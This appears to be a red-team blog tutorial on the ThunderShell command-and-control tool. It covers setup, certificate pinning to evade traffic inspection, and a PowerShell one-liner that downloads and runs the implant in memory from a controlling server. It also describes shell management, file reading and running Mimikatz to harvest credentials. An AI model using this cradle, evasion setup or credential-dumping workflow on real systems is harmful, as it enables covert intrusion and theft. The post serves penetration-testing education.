Command and control tools usually rely on a variety of protocols as a communication mechanism such as DNS, ICMP, HTTPS etc. Most endpoint products perform some deep packet inspection in order to drop any arbitrary connections. Using a protocol that supports encryption and pin the generated traffic with a certificate can evade the majority of the products and it should be considered as a method during red team engagement.

ThunderShell was developed by MrUn1k0d3r and it is based in Python. It uses a Redis server for HTTPS communication between the implant and the server and PowerShell for execution of the implant on the target and any other scripts. The main advantage is that supports certificate pinning for bypassing security products that perform traffic inspection. A similar tool that uses HTTPS as a communication protocol and PowerShell is called PoshC2.

ThunderShell has the following dependencies:

apt install redis-server
apt install python-redis

The default.json file contains the tool configuration where traffic encryption can be enabled by setting an encryption key and pinned with a certificate to avoid detection.

ThunderShell - Configuration
ThunderShell – Configuration

When ThunderShell is executed it will start a web server which by default will listen on port 8080. The web server will handle all the HTTP requests from the implants.

ThunderShell - Console
ThunderShell – Console

The implant (PS-RemoteShell) needs to be hosted on a webserver that is controlled by the red team. The implant requires the following parameters:

  • IP – Webserver
  • Port – Webserver
  • Encryption Key
  • Delay

The following command will download and execute the implant directly from memory.

IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.169/tmp/PS-RemoteShell.ps1'); PS-RemoteShell -ip 192.168.1.169 -port 8080 -Key test -Delay 2000
ThunderShell - Implant Execution
ThunderShell – Implant Execution

Once the implant is executed on the target it will communicate with the web server and a new shell will obtained.

ThunderShell - Shell
ThunderShell – Shell

Every shell has its own unique ID. The list of the active shells with their associated ID’s can be obtained with the “list” command.

ThunderShell - List Active Shells
ThunderShell – List Active Shells

Interaction with the shell is needed before the execution of any commands on the target.

ThunderShell - Interaction with the Shell
ThunderShell – Interaction with the Shell

ThunderShell has also the ability to read files, execute commands and  scripts in memory, file transfer etc.

ThunderShell - Read Files
ThunderShell – Read Files

Commands can be executed on the target like any other normal shell.

ThunderShell - Executing Commands
ThunderShell – Executing Commands

Since it is using PowerShell it is possible to execute various scripts that could enhance the capability of the tool like Mimikatz.

ThunderShell - Mimikatz Execution
ThunderShell – Mimikatz Execution

The results from Mimikatz can retrieved with the command refresh.

ThunderShell - Mimikatz
ThunderShell – Mimikatz

References

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s